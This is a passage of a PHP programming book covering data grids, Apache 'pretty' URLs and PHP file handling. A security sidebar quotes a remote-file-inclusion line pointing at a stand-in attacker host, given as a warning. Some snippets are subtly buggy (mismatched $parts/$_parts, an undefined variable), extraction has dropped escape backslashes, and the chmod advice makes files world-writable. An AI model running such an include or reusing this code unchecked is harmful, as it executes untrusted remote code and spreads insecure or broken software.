add them to our grid object using the addColumn method:

                                                    pearDataGridCustom.php (excerpt)

   $datagrid = new Structures_DataGrid(2);

   $thumb = new Structures_DataGrid_Column("", "thumb", "thumb",
       null, null, "getThumbnail()");
   $datagrid->addColumn($thumb);

   $name = new Structures_DataGrid_Column("Name", "name",
       "first_name", null, null, "getName()");
   $datagrid->addColumn($name);

   $email = new Structures_DataGrid_Column("E-Mail", "email",
       "email");
   $datagrid->addColumn($email);

   $login = new Structures_DataGrid_Column("Login Name", "login",
       "login");
   $datagrid->addColumn($login);
136   The PHP Anthology



         $sig = new Structures_DataGrid_Column("Signature", "signature",

             "signature");

         $datagrid->addColumn($sig);


         $datagrid->setDefaultSort(array('first_name' => 'ASC'));




      We also set the default ordering of the data so that it’s arranged by first name, in
      ascending (alphabetical) order. The code skeleton for the Structures_DataG­
      rid_Column constructor is shown below:


       Structures_DataGrid_Column(

           string $label,

           [string $field = null],

           [string $orderBy = null],

           [array $attributes = array()],

           [string $autoFillValue = null],

           [mixed $formatter = null],

           [array $formatterArgs = array()]

       );



      Our custom column code above displays two important code features: the custom
      formatter functions for the $thumb and $name columns (specified in their last argu­
      ments), and the orderBy argument for the $name column. In the case of the $name
      column, the orderBy argument is important because when we concatenate the two
      names together, we can no longer sort by one or the other. As such, we have to
      supply either a column name or an expression on which to sort. In our solution,
      we’ve chosen to sort by the first name.

      Next, we bind the grid to the SQL query using the bind method:

                                                           pearDataGridCustom.php (excerpt)

         $options = array(
             'dsn' => "mysql://$user:$password@$db_host/$db_name");
         $sql = "SELECT DISTINCT * FROM user".
             " LEFT JOIN user_images".
             " ON user.id = user_images.user_id";

         $bind = $datagrid->bind($sql, $options);
         if (PEAR::isError($bind))
Forms, Tables, and Pretty URLs      137


   {

     error_log('DataGrid Error: '. $bind->getMessage());

     $gridsource = '';

   }




We pass database information in the $options array so that our
Structures_DataGrid object will be able to automatically choose the correct database
driver to use and make a connection. We check for errors generated from the bind
method call using the PEAR::isError method, and if we detect an error, we make
sure to log it and set our $gridsource variable to an empty string. This ensures that
the displayed web page will not contain any cryptic error messages.

If no errors arise, we can proceed to customize the appearance our grid. We add
new icons to show the ordering direction, set custom colors for the header row and
the alternate row color, and specify some custom table attributes:

                                                     pearDataGridCustom.php (excerpt)

   else
   {
     $renderer_options = array(
         'sortIconASC' => '<img src="images/up.gif" />',
         'sortIconDESC' => '<img src="images/down.gif" />',
         'headerAttributes' => array('bgcolor' => '#E3E3E3'),
         'evenRowAttributes' => array('bgcolor' => '#A6A6A6'),
     );
     $datagrid->setRendererOptions($renderer_options);

      $renderer = $datagrid->getRenderer();
      $renderer->setTableAttribute('cellspacing', 0);
      $renderer->setTableAttribute('cellpadding', 5);
      $renderer->setTableAttribute('border', 1);



We then retrieve the HTML source of our grid and pager using the getOutput
method, and store it in the $gridsource variable:
138   The PHP Anthology

                                                         pearDataGridCustom.php (excerpt)

             $gridbody = $datagrid->getOutput();
             if (PEAR::isError($gridbody))
             {
               error_log('DataGrid render error: ' .
                   $gridbody->getMessage());
               $gridbody = '';
             }
             // Finally, render the pager, again checking for errors
             $gridpager = $datagrid->getOutput(DATAGRID_RENDER_PAGER);
             if (PEAR::isError($gridpager))
             {
               error_log('DataGrid render error: ' .
                   $gridpager->getMessage());
               $gridpager = '';
             }
             $gridsource = $gridbody . $gridpager;
         }
       ?>



      When we call the getOutput method, we make sure to test the return value for errors
      and take appropriate action.

      Finally, our grid can be output in a web page:

                                                         pearDataGridCustom.php (excerpt)

       <!DOCTYPE html public "-//W3C//DTD XHTML 1.0 Transitional//EN"
         "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
         <head>
         ⋮ HTML head contents…
         </head>
         <body>
           <h1>PEAR::Structures_DataGrid, Customized!</h1>
           <?php echo $gridsource ?>
         </body>
       </html>



      We can see the resulting output in Figure 5.5.
Forms, Tables, and Pretty URLs   139




                             Figure 5.5. The customized data grid


How do I make “pretty” URLs in PHP?
One of the first things every PHP developer learns is the concept of GET, or query
string, arguments—the variables attached to the end of a URL, which allow the
sending of arbitrary data to your PHP script. However, it quickly becomes apparent
that URLs with lots of query string arguments are quite ugly. In years past there has
been much talk about the importance of creating search engine friendly URLs, but
in reality, this is a myth—any modern spider (Google or Yahoo! for example) will
index URLs that make use of query string arguments. The most compelling argument
for the practice now is “pretty” URLs—URLs that are both human-readable and
easily memorable.

What would you prefer to see:

http://example.org/index.php?action=edit&item=163&what=trackbacks

Or:

http://example.org/edit/trackbacks/for/163-My-Example-Page

Pretty URLs most often consist of three types of elements: the action (/edit), the
type of action (/trackbacks), and one or more key-value pairs
(/for/163-My-Example-Page).
140   The PHP Anthology


      Solutions
      Apache provides us with several options for creating pretty URLs: AcceptPathInfo,
      MultiViews and mod_rewrite.

      Pretty URLs with AcceptPathInfo
      AcceptPathInfo is an Apache2 Directive that controls whether requests that have
      a path appended to a filename will be accepted or rejected.14 If it’s enabled, the
      path information is made available to PHP in the $_SERVER['PATH_INFO'] variable.
      This facility is usually available to PHP because Apache allows the PHP interpreter
      module to specify that this option is turned on.

      AcceptPathInfo lets us create URLs like this:

      http://example.org/index.php/edit/trackbacks/for/163-My-Example-Page

      This is an improvement on the URL we saw above, but it’s still not entirely pretty,
      as it contains a filename that people must remember, and which is superfluous to
      the URL.

      Pretty URLs with MultiViews
      We can go part of the way to remedying the problem of URLs containing filenames
      using AcceptPathInfo in conjunction with the the MultiViews option.15 MultiViews
      is used for content negotiation, which means that it can be used to send a French
      translation of a resource to browser clients set to prefer reading French, or a GIF
      version of an image to browser clients set to prefer GIF over the JPEG format (or
      cannot render JPEG format images, for example).

      MultiViews offers the side-effect of allowing us to reference files without their ex­
      tensions. We enable it using the following in an .htaccess file or in the httpd.conf:

       Options MultiViews



      We can now use the following URL:

      http://example.org/index/edit/trackbacks/for/163-My-Example-Page


      14
           http://httpd.apache.org/docs/2.0/mod/core.html#acceptpathinfo
      15
           http://httpd.apache.org/docs/2.0/content-negotiation.html
Forms, Tables, and Pretty URLs       141

Now we’re getting something close to our ideal URL. We can obviously rename our
PHP file from index.php to something a little more intuitive; for example, by naming
it admin.php, we end up with this URL:

http://example.org/admin/edit/trackbacks/for/163-My-Example-Page

Both of these options are supported by Apache by default, but your ability to set
MultiViews in your .htaccess file will depend on your host. Even in this best-case
scenario, though, we still end up with an unwanted element in our URL: the real
filename, which makes this URL longer and harder to remember than one that
doesn’t contain this element.

Pretty URLs with mod_rewrite
mod_rewrite provides us with a very powerful (and complex) system for getting the
exact results we want. However, mod_rewrite is not part of the core Apache server,
and while it’s enabled by default on most distributions (and included with the
Apache Win32 binary), it may not be available on your server. That’s why this is
not the be-all and end-all solution to the problem. The two solutions above are more
portable than this one; however, the code we will use to deal with the paths in this
solution will work with all three solutions.

To use mod_rewrite, we must place something like the following code in an
.htaccess file in your web server’s root directory:


 RewriteEngine On

 RewriteCond %{REQUEST_FILENAME} !-f

 RewriteCond %{REQUEST_FILENAME} !-d

 RewriteRule !.(js|ico|gif|jpg|css)$ /index.php [L]



The first two RewriteCond statements check that the incoming request doesn’t refer
to an existing file or directory. If that’s true, the RewriteRule statement will rewrite
the incoming request to a request for /index.php as long as the request does not
contain one of the listed filename extensions.

Once this code is in place, we can create our ideal URL:

http://example.org/edit/trackbacks/for/163-My-Example-Page
142   The PHP Anthology

      Handling Pretty URLs
      PHP makes the path information available in the $_SERVER['PATH_INFO'] for the
      AcceptPathInfo or MultiViews solutions, and in $_SERVER['REQUEST_URI'] when
      using mod_rewrite. We can handle those paths using a simple PHP class that will
      extract the path information from the incoming request.

      We’ll call the class RequestPath and give it a single private property, $parts, to
      hold all the parts of our request URLs:

                                                               RequestPath.class.php (excerpt)

       class RequestPath
       {
         private $parts = array();



      The actual path parsing happens in the __construct method, which simply explodes
      the path on the forward slash (/) character and then proceeds to handle the first
      two path elements as special cases before dealing with the key-value pairs that follow
      them. The first thing we do is grab the path and trim the trailing / character if there
      is one:

                                                               RequestPath.class.php (excerpt)

         public function __construct()
         {
           if (isset($_SERVER['PATH_INFO']))
           {
             $path = (substr($_SERVER['PATH_INFO'], -1) == "/") ?
                 substr($_SERVER['PATH_INFO'], 0, -1) :
                 $_SERVER['PATH_INFO'];
           }
           else
           {
             $path = (substr($_SERVER['REQUEST_URI'], -1) == "/") ?
                 substr($_SERVER['REQUEST_URI'], 0, -1) :
                 $_SERVER['REQUEST_URI'];
           }



      Next, we split the path into an array on the / character. The first element we’ll
      consider to be the action, the second we’ll consider to be the type:
Forms, Tables, and Pretty URLs        143

                                                        RequestPath.class.php (excerpt)

       $bits = explode("/", substr($path, 1));

       $parsed['action'] = array_shift($bits);
       $parsed[] = $parsed['action'];

       $parsed['type'] = array_shift($bits);
       $parsed[] = $parsed['type'];



The remaining elements we group into key-value pairs. If an odd number of elements
remains, we simply place the last element on the end of our key-value array:

                                                        RequestPath.class.php (excerpt)

       $parts_size = sizeof($bits);
       if ($parts_size % 2 != 0) {
         $parts_size -= 1;
       }

       for ($i = 0; $i < $parts_size; $i+=2) {
         $parsed[$bits[$i]] = $bits[$i+1];
         $parsed[] = $bits[$i+1];
       }

       if (sizeof($bits) % 2 != 0) {
         $parsed[] = array_pop($bits);
       }



Finally, as the last step of our constructor method, we assign our assembled array
of path elements to our class’s private $parts array:

                                                        RequestPath.class.php (excerpt)

       $this->parts = $parsed;
   }



We can make use of the __get, __set, and __isset magic methods in our
RequestPath class, enabling users of the class to get, set, and test the path element
values by using the key as if it were a class property, and keeping our class nice
and simple:
144   The PHP Anthology

                                                            RequestPath.class.php (excerpt)

         public function __get($key)
         {
           return $this->parts[$key];
         }
         public function __set($key, $value)
         {
           $this->_parts[$key] = $value;
         }
         public function __isset($key)
         {
           return isset($this->_parts[$key]);
         }
       }
       ?>



      Using the code is even simpler. Imagine that the incoming request is:

      http://yourhostname/edit/trackbacks/for/163-My-Example-Page

      We can access the path information by creating a new RequestPath object:

       <?php

         require_once 'RequestPath.class.php';

         $request = new RequestPath();

         echo "Request action: {$request->action}</br>";

         echo "Request type: {$request->type}</br>";

         echo "Request for: {$request->for}</br>";

       ?>



      That code should output the following:

       Request action: edit</br>

       Request type: trackbacks</br>

       Request for: 163-My-Example-Page</br>



      Discussion
      Once we have pretty URLs set up and functioning, we can start to implement pro­
      fessional solution architectures such as the Model-View-Controller architecture, or
Forms, Tables, and Pretty URLs   145

MVC.16 Pretty URLs are fast becoming an essential requirement for popular sites
and it’s important to think about your URLs carefully, and make them as memor­
able—or as “guessable”—as possible.


Summary
In this chapter, we’ve explored a number of ways to make building web forms and
tables a whole lot easier, in order to free up our time to focus on the aspects of web
development that matter. There’s some degree of commonality between every table
and every form, yet our roles as developers involve handling the differences—we
can automate the common ground, but we need to learn to handle the aspects that
make each case unique. This chapter also gave us a chance to experiment with using
the Apache web server and some simple PHP to apply pretty URLs in our web ap­
plications.

Together, tables, forms, and pretty URLs are common tasks in the working experience
of any web developer. The goal of this chapter has been to highlight the aspects of
development that we can automate, and to make it easier to handle the parts we
can’t. Unfortunately, nothing but experience can make the job easy all the time!




16
     http://en.wikipedia.org/wiki/Model-view-controller
The PHP Anthology
6
                                                             Chapter




Working with Files
Databases make great tools for storing information because they’re fast and, with
the help of SQL, easy to navigate. Sometimes, though, you need to be able to access
the data stored in a file—be it an image, configuration information, or even a web
page on a remote server. PHP makes such work easy with its powerful collection
of file functions. The only hard part is choosing the right tool for the job!

For the sake of demonstration, I’ve saved a copy of the printable version of Pax
Dickinson’s article “Top 7 PHP Security Blunders!,”1 which we’ll manipulate with
PHP’s file functions. The file is saved as writeSecureScripts.html in this book’s code
archive.




1
    http://www.sitepoint.com/article/php-security-blunders
148   The PHP Anthology


                A Word on Security
               Before you run riot with PHP’s file functions, think carefully about what you’re
               doing: you will be making files from your operating system available on a web
               page that will be exposed to the Internet. Check and double-check the code that
               accesses files—look for holes in your logic that might allow unwanted access to
               those files.

               Be particularly careful when allowing files and directories to be identified via
               URLs, or to be uploaded or downloaded from your site. This warning also extends
               to PHP’s include commands, which can be used to execute scripts included from
               a remote web server, for example: include
               'http://www.hacker.com/bad_script.txt';.

               Because of the potential for danger, php.ini settings are available to turn off this
               functionality. allow_url_fopen = Off is used to disable support for the
               opening of remote files via URLs to the URL-aware fopen wrappers. As of version
               5.2, there’s also the allow_url_include setting, which does the same thing for
               the include, include_once, require, and require_once functions. If
               allow_url_fopen is turned off, allow_url_include is automatically turned
               off as well.

               I’ll be highlighting the potential dangers with each solution so that, with care,
               you can learn to write secure code.



      How do I read a local file?
      There are as many ways to read a local file as you can think of. In this solution,
      we’ll discuss a couple of the most popular approaches, but if you wish to continue
      investigating, check out the relevant manual page.2

      Solutions
      This section covers three options: reading a file as an array, reading a file as a string,
      and reading a file directly to the screen.




      2
          http://www.php.net/filesystem/
Working with Files      149

Reading a File as an Array
First up is PHP’s file function, which reads a file into an array, using the new line
character to indicate where a new array element should begin:

                                                                fileFunc.php (excerpt)

 <?php
 $file = file('writeSecureScripts.html');
 $lines = count($file);
 $alt = '';
 for ($i=0; $i<$lines; $i++) {
   $alt = ($alt == 'even') ? 'odd' : 'even';
   echo '<div class="' . $alt . '">';
   echo $i . ': ' . htmlspecialchars($file[$i]);
   echo "</div>n";
 }
 ?>



Hey, presto! Up pops the file in a nicely formatted page so you can examine it line
by line. We simply loop over the $file variable—an array—with our for loop, and
display it as we wish.

One thing you may have noticed in the above code is that we used a ternary oper­
ator for the alternate row colors in the line after the for loop. A ternary operator
takes three arguments and is a shortcut approach to writing a simple if statement.
The basic syntax is as follows:

 (condition) ? true : false



The output of our work can be seen in Figure 6.1.
150   The PHP Anthology




                                Figure 6.1. Reading a local file as an array


      Reading a File as a String
      As of PHP 4.3, the function called file_get_contents reads a file straight into a
      string without breaking it up:

                                                                               fileGetFunc.php (excerpt)

       <?php
       $file = file_get_contents('writeSecureScripts.html');
       $file = strip_tags($file);
       ?>
       <form>
         <textarea>
       <?php
       echo htmlspecialchars($file);
Working with Files      151


 ?>

   </textarea>

 </form>




The content of the file is now displayed in an HTML textarea stripped of all its
HTML tags. The output is depicted in Figure 6.2.




                           Figure 6.2. Reading a local file as a string


Reading a File Directly to the Screen
Another way to read a local file is to use the readfile function, which fetches the
content of the file and displays it directly on the screen:

                                                                          readFileFunc.php (excerpt)

 <?php
 readfile('writeSecureScripts.html');
 ?>
152   The PHP Anthology

      This one line of code displays the file exactly as it was found—do not stop at go,
      do not collect $200. The output is shown in Figure 6.3.




                                 Figure 6.3. Reading a local file directly to the screen


      Discussion
      readfile is a handy way to safeguard your files and bandwidth. By linking all the
      files on your web site through a script using the readfile function, you can prevent
      others from linking directly to them and potentially sapping your web site’s band­
      width.3 This approach uses what’s commonly referred to as an “anti-leaching”
      script. If you bring an authentication system and/or HTTP referrer check into the
      mix, you’ll have a secure system that ensures that only legitimate visitors to your
      site can access your files.

      3
       For an example of how to prevent this kind of pilfering, see “How do I manage file downloads with
      PHP?”
Working with Files       153


How do I use file handles?
To use the file functions we saw in the previous solution, you simply need to point
them at the file they have to read, using a path that’s relative to the PHP script that
executes the function. However, the majority of PHP’s file functions use a slightly
different mechanism to access a file—a mechanism that’s very similar to that used
to connect to a database. The process uses the fopen function to “connect” and
fclose to “disconnect.” The value returned from the fopen function is a PHP file
pointer, also known as the handle of the file. Once we have a handle on a file, we
can use it to perform a variety of operations on the file, including reading it, append­
ing to it, modifying it, and so on.

Solutions
This simple example demonstrates how to open and close that “connection” to the
file:

                                                                 fileHandle.php (excerpt)

    <?php
    $location = 'writeSecureScripts.html';
    $fp = fopen($location, 'rb');
    ⋮ the file handle $fp is now available
    fclose($fp);
    echo $file;
    ?>



When you use fopen to connect to a file, you must specify the path to the file and
a mode in which the file is to be accessed (such as r for read-only). The b mode in­
dicator indicates that the file is to be opened in binary mode. As is noted on the
manual page for fopen,4 binary mode should always be specified to ensure the
portability of your code between operating systems. For more information on the
various modes that are available, read the manual page.

Handling Small Files
Now that we have a file handle, let’s use it to read the file:



4
    http://www.php.net/fopen/
154   The PHP Anthology

                                                                       fileHandle.php (excerpt)

       <?php
       $location = 'writeSecureScripts.html';
       $fp = fopen($location, 'rb');
       $file_contents = fread($fp, filesize($location));
       fclose($fp);
       echo $file_contents;
       ?>



      This example merely demonstrates file handles in action. Notice that when we use
      fread, the second argument reflects the amount of data, in bytes, that will be read
      from the start of the file. For this argument, I’ve used the filesize function, which
      tells me the total size of the file.

      Handling Larger Files
      The previous solution is fine for small files. However, when it’s reading all the
      contents of a large file, PHP will be forced to fill a lot of memory with those contents,
      possibly causing a performance issue. To alleviate the potential for this problem,
      we take a different approach to reading the contents of a large file—we read the file
      in chunks, and operate on each chunk as we go:

                                                                      fileHandle2.php (excerpt)

       <?php
       $fp = fopen('writeSecureScripts.html', 'rb');
       while (!feof($fp)) {
         $chunk = fgets($fp);
         echo $chunk;
       }
       fclose($fp);
       ?>



      In our example, the file is opened as normal. Next, to read the contents of the file,
      we use a while loop, which continues so long as the feof function returns FALSE.
      feof returns TRUE if the end of the file has been reached, or if there’s an error with
      the file handle (such as a loss of connection, which can occur with remote files).
Working with Files      155

Next, we use fgets to fetch a “chunk” of the file, beginning at the current location
and running to the next line-feed character. We get the string back, and fgets moves
the internal PHP file pointer for the file handle forward accordingly.

Discussion
Many more functions are available for reading a file using a file handle. One is
fgetss (note the double s), which is almost the same as fgets but strips out any
HTML tags it finds in the same way the strip_tags function would. Another is
fscanf, which formats the output from the file in the same way printf does. And
let’s not forget fgetcsv, which makes handling csv (comma separated values) files
a piece of cake. In an idle moment, it’s well worth browsing the file system functions
for goodies.5

But if all you wish to do is read the entire contents of a file into a variable, the file
and file_get_contents functions are easier to use, and offer potentially better
performance.


How do I modify a local file?
Now that you’ve seen how to read the contents of a file and you’re acquainted with
file handles, how about updating files? Again, it’s easy with PHP.

Solution
Take a look at this code:

                                                                      write.php (excerpt)

    <?php
    $lines = file('writeSecureScripts.html');
    $fp = fopen('writeSecureScripts.txt', 'w');
    foreach ($lines as $line) {
      $line = strip_tags($line);
      fwrite($fp, $line);
    }
    fclose($fp);
    echo '<pre>';




5
    http://www.php.net/manual/en/ref.filesystem.php
156   The PHP Anthology


          echo file_get_contents('writeSecureScripts.txt');

          echo '</pre>';

          ?>




      We use the fwrite function to write a string to a file. Take note of the mode we
      used when we opened the new file with fopen. The mode w will open the file for
      writing, beginning at the very start of the file and overwriting anything that already
      exists. If we’d used a instead, the new contents would have been appended to the
      file, preserving the original contents. In either case, the file will be created if it
      doesn’t already exist.

      For a fast, no-nonsense method for writing to a file, investigate the
                                   6
      file_put_contents function. It’s identical to calling fopen, fwrite, and fclose,
      as we saw in “How do I use file handles?”.

      Discussion
      Be aware that on a Unix-based web server, PHP will usually run as a user such as
      www or nobody—an account that has very limited permissions and isn’t owned spe­
      cifically by you. Files that are created by PHP will need to be placed in a directory
      to which that user has write permissions.

      To make a file or directory readable and writable, use this command:

      chmod o=rw <directory | file>


      If you need to execute the file as well (for instance, it’s a PHP script), use the follow­
      ing command:

      chmod o=rwx <directory | file>



                 Protecting Sensitive Files
               If you use a shared server, making directories readable and writable like this means
               that other people with accounts on the server will be able to read and modify the
               contents of those directories. Be careful about the type of information you place
               in them! Your web host should be able to help you address any security concerns.



      6
          http://www.php.net/file_put_contents/
Working with Files       157


How do I access

information about a local file?

PHP comes with a range of functions to help you obtain information about a file.

Solution
In the following example, we use a number of handy functions:

■ file_exists, to check whether the file exists
■ is_file, to check the file is indeed a file and not a directory
■ is_readable, to check whether the file can be read
■ is_writable to check whether the file can be written to
■ filemtime to check the date and time at which the file the file was last modified
■ fileatime to find the date and time the file at which was last accessed
■ filesize to check the file’s size

We also wrap the result in some custom code to make it more readable:

                                                                fileInfo.php (excerpt)

 <?php
 // Function to convert a size to        bytes to large units
 function fileSizeUnit($size)
 {
   if ($size >= 1073741824)
   {
     $size = number_format(($size       / 1073741824), 2);
     $unit = 'GB';
   }
   else if ($size >= 1048576)
   {
     $size = number_format(($size       / 1048576), 2);
     $unit = 'MB';
   }
   else if ($size >= 1024)
   {
     $size = number_format(($size       / 1024), 2);
     $unit = 'KB';
   }
   else if ($size >= 0)
158   The PHP Anthology


         {

           $unit = 'B';

         }

         else

         {

           $size = '0';

           $unit = 'B';

         }

         return array('size' => $size, 'unit' => $unit);

       }


       $file = 'writeSecureScripts.html';


       // set the default timezone to use. Available since PHP 5.1

       // needed otherwise date() throws an E_STRICT error in v5.2

       date_default_timezone_set('UTC');


       // Does the file exist

       if (file_exists($file))

       {

         echo 'Yep: ' . $file . ' exists.<br />';

       }

       else

       {

         die('Where has: ' . $file . ' gone!<br />');

       }


       // Is it a file? Could be is_dir() for directory

       if (is_file($file))

       {

         echo $file . ' is a file<br />';

       }


       // Is it readable

       if (is_readable($file))

       {

         echo $file . ' can be read<br />';

       }


       // Is it writable

       if (is_writable($file))

       {

         echo $file . ' can be written to<br />';

       }
Working with Files   159


 // When was it last modified?

 $modified = date("D d M g:i:s", filemtime($file));


 echo $file . ' last modifed at ' . $modified . '<br />';


 // When was it last accessed?

 $accessed = date("D d M g:i:s", fileatime($file));

 echo $file . ' last accessed at ' . $accessed . '<br />';




 // Use a more convenient file size

 $size = fileSizeUnit(filesize($file));


 // Display the file size

 echo 'It's ' . $size['size'] . ' ' . $size['unit'] .

      ' in size.<br />';


 ?>




Discussion
The fileSizeUnit function we used at the start of this code helps to make the result
of PHP’s filesize function more readable.

PHP keeps a cache of the results of file information functions to improve perform­
ance. Sometimes, though, it will be necessary to clear that cache; we do so using
the clearstatcache function. The output of the code above can be seen in Figure 6.4.




                            Figure 6.4. Retrieving file information
160   The PHP Anthology


      How do I examine directories with PHP?
      When you’re creating web-based file managers in PHP, it’s handy to be able to explore
      the contents of directories.

      Solutions
      There are two basic approaches to examining directories with PHP—you should
      use whichever method you prefer.7

      Using the readdir Function
      The first approach, which uses the opendir, readdir, and closedir functions, is
      similar to the process of using fopen , fread, and fclose to read a file:

                                                                                    readdir.php (excerpt)

          <?php
          $location = './';
          $dp = opendir($location);
          while ($entry = readdir($dp))
          {
            if (is_dir($location . $entry))
            {
              echo '[Dir] ' . $entry . '<br />';
            }
            else if (is_file($location . $entry))
            {
              echo '[File] ' . $entry . '<br />';
            }
          }
          closedir($dp);
          ?>




      7
       We’ll discuss a third option later in “How do I work with files using the Standard PHP Library in PHP
      5?”
Working with Files      161

Using the dir Pseudo-Class
The alternative approach is to use the dir pseudo-class.8 dir is used in a very
similar way to readdir:

                                                                            readdir2.php (excerpt)

    <?php
    $location = './';
    $dir = dir($location);
    while ($entry = $dir->read())
    {
      if (is_dir($location . $entry))
      {
        echo '[Dir] ' . $entry . '<br />';
      }
      else if (is_file($location . $entry))
      {
        echo '[File] ' . $entry . '<br />';
      }
    }
    $dir->close();
    ?>




How do I display PHP
source code online?
Sometimes, you might want to display the source of a file. Maybe you’re making
the code publicly available, but you don’t want to handle downloads. Or you don’t
want to continually update the display page so it remains synchronized with the
actual code (after all, you may be continually improving it). As it turns out, being
a bit lazy isn’t a crime after all.

Solution
PHP provides a very handy function for displaying code: highlight_string, which
displays PHP code in a presentable manner using the formatting defined in php.ini.


8
    dir defines the Directory class—one of the predefined classes that are built into PHP. You can
read more about predefined classes on the manual page at
http://www.php.net/manual/en/reserved.classes.php.
162   The PHP Anthology

      Displaying code is even easier with the partner to this function, highlight_file,
      which can simply be passed the name of the file you want to display:

                                                                     highlight.php (excerpt)

       <?php
       // Define an array of allowed files - VERY IMPORTANT!
       $allowed = array('fileInfo.php',
                       'fileGetFunc.php',
                       'fileHandle.php',
                       'fileHandle2.php');
       if (isset($_GET['view']) && in_array($_GET['view'], $allowed))
       {
         highlight_file($_GET['view']);
       }
       else
       {
         $location = './';
         $dir = dir($location);
         while ($entry = $dir->read())
         {
           if (in_array($entry, $allowed))
           {
             echo '<a href="' . $_SERVER['PHP_SELF'] .
                 '?view=' . $entry . '">' . $entry . "</a><br />n";
           }
         }
         $dir->close();
       }
       ?>



      In PHP 4.2.0 or later, if you pass a second argument of TRUE to highlight_string
      or highlight_file, the function will return the results as a string rather than dis­
      playing the file directly.

      The output from highlight.php is shown in Figure 6.5.
Working with Files   163




                             Figure 6.5. Displaying PHP source code


Discussion
I take care to allow access only to specified files when I’m displaying either directory
contents, or individual file sources. It’s important to be extremely cautious about
the way you display your source code, or you may find yourself giving away more
than you expected, such as the usernames and passwords used to access a database.

Note that hiding code in the interests of security is not what I’m advocating here.
Code should be written to be secure in the first place. Hiding code so that no one
discovers the holes in it is a recipe for disaster. Eventually someone will find out
what you’ve been hiding and—worse still—you’ll probably be ignorant of the fact
that they’re exploiting your lax security.


How do I store configuration
information in a file?
Certain information that’s used repeatedly throughout your site (such as passwords,
paths, and variables) is best stored in a single file. That way, should you need to
move your code to another site, you’ll be able to modify the settings once, rather
than hundreds of times throughout your code.
164   The PHP Anthology


      Solution
      The easiest way to store configuration information is to create the variables in an
      .ini file, then include this file in your code using the parse_ini_file function,
      which parses files that use the same format as php.ini. Here’s an example .ini file:

                                                                       example.ini (excerpt)

       ; Settings to connect to MySQL
       [Database_Settings]
       host=localhost
       user=littleme
       pass=secret
       dbname=world

       ; Default locations of various files
       [Locations]
       css=/home/littleme/myinc/css
       javascript=/home/littleme/myinc
       images=/home/littleme/image



      This script uses the parse_ini_file function to retrieve values from your .ini file:

                                                                      parseini.php (excerpt)

       <?php
       $iniVars = parse_ini_file('example.ini', TRUE);
       echo '<pre>';
       print_r($iniVars);
       echo $iniVars['Locations']['css'];
       echo '</pre>';
       ?>



      And here’s the output of the script:

       Array

       (

           [Database_Settings] => Array

               (

                   [host] => localhost

                   [user] => littleme

                   [pass] => secret
Working with Files         165


                     [dbname] => world

               )


         [Locations] => Array

             (

                 [css] => /home/littleme/myinc/css

                 [javascript] => /home/littleme/myinc

                 [images] => /home/littleme/image

             )


    )

    /home/littleme/myinc/css



Discussion
Using an .ini file to store your configuration information offers some advantages
over keeping the information in your PHP files. Sometimes, editing PHP files will
make your users nervous—it may be hard for them to see which settings are editable,
and it may be possible for them to break your script if they change something they
shouldn’t. Also, as the .ini file extension differs from those of your script files, it’s
relatively easy to secure all .ini files with a .htaccess that contains a simple directive.9


           Configuration File Security
         Generally speaking, it’s best to not store your configuration file in the web root
         directory—especially because it usually contains user and password information.
         Since you can include a file from anywhere within your file system, you might
         as well play it safe: leave it out of hackers’—and Google’s—reach by placing it
         outside the web root directory on your server.

         If you absolutely must store the configuration files in the web root directory, be
         sure to protect them by including a file directive in your .htaccess file to restrict
         who may access the files. To make your configuration information absolutely se­
         cure, you can always encrypt the sensitive data (perhaps using a tool such as
         mcrypt).10




9
    See http://httpd.apache.org/docs/2.0/mod/core.html#files for more information about file directives.
10
     http://www.php.net/mcrypt/
166   The PHP Anthology


      How do I access a file on a remote server?
      For the most part, PHP can access files on a remote server over the Internet in almost
      exactly the same way as it does local files.

      Solution
      The fopen function can take a URL instead of a file path as its first argument. In
      this example, we open a web page as if we’re opening a file:

                                                                                    urlFopen.php (excerpt)

       <?php
       $fp = fopen('http://www.sitepoint.com/print/758', 'r');
       while (!feof($fp))
       {
         $chunk = fgets($fp);
         echo $chunk;
       }
       fclose($fp);
       ?>



      Discussion
      PHP implemented the use of streams in version 4.3.0 as a way to unify file, network,
      data compression, and other operations into a common set of functions.11 Basically,
      if you can read the data in a linear fashion, you’re using streams.

      The ability to handle both remote and local files as streams is built into the various
      file functions, which certainly makes life easier. The downside is that by allowing
      the handling of remote files as if they’re local, PHP makes it very easy for you to
      unwittingly open your site up to security risks.12




      11
           Learn more about streams at http://www.php.net/stream/.

      12
           You can set the php.ini file setting allow_url_fopen = Off to disable PHP’s ability to open remote

      files if you prefer.
Working with Files      167

If you choose to not use fopen to open remote files, there are alternatives, including
using cURL13 or sockets.14 Neither option is as simple as using fopen, though they
achieve the same end.


How do I use FTP from PHP?
One of the great things about PHP is the sheer amount of functionality that’s either
built into it, or is only an extension away. File Transfer Protocol (FTP) is a great
example of such functionality.

Solutions
Here are two popular approaches that you can take to using FTP from PHP.

Using PHP’s Built-in FTP Functions
You can use PHP’s FTP functionality to have PHP scripts act as clients to an FTP
server. This can be useful for countless tasks, whether you’re building a web interface
for an FTP file repository, or developing a tool to update your site from your PHP
development environment. In order to use the FTP functions, you’ll need to make
sure your host has enabled PHP’s FTP functionality.

In this example, we use PHP’s FTP functionality to connect to an FTP server and
list the files in a directory:

                                                                      ftp.php (excerpt)

 <?php
 set_time_limit(0);
 $ftpServer = 'localhost';
 $targetDir = '/';
 if (!$fp = ftp_connect($ftpServer, 21, 30))
 {
   die('Connection failed');
 }
 if (!ftp_login($fp, 'anonymous', 'user@domain.com'))
 {
   die('Login failed');
 }


13
     http://www.php.net/curl/
14
     http://www.php.net/sockets/
168   The PHP Anthology


       if (!ftp_chdir($fp, $targetDir))

       {

         die ('Unable to change directory to: ' . $targetDir);

       }

       echo "<pre>Current Directory:" . ftp_pwd($fp) .

            "nn";

       echo "Files Available:n";

       $files = ftp_nlist($fp, '/');

       foreach ($files as $file)

       {

           echo $file . "n";

       }

       echo '</pre>';

       ?>




      Using the PEAR::Net_FTP Class
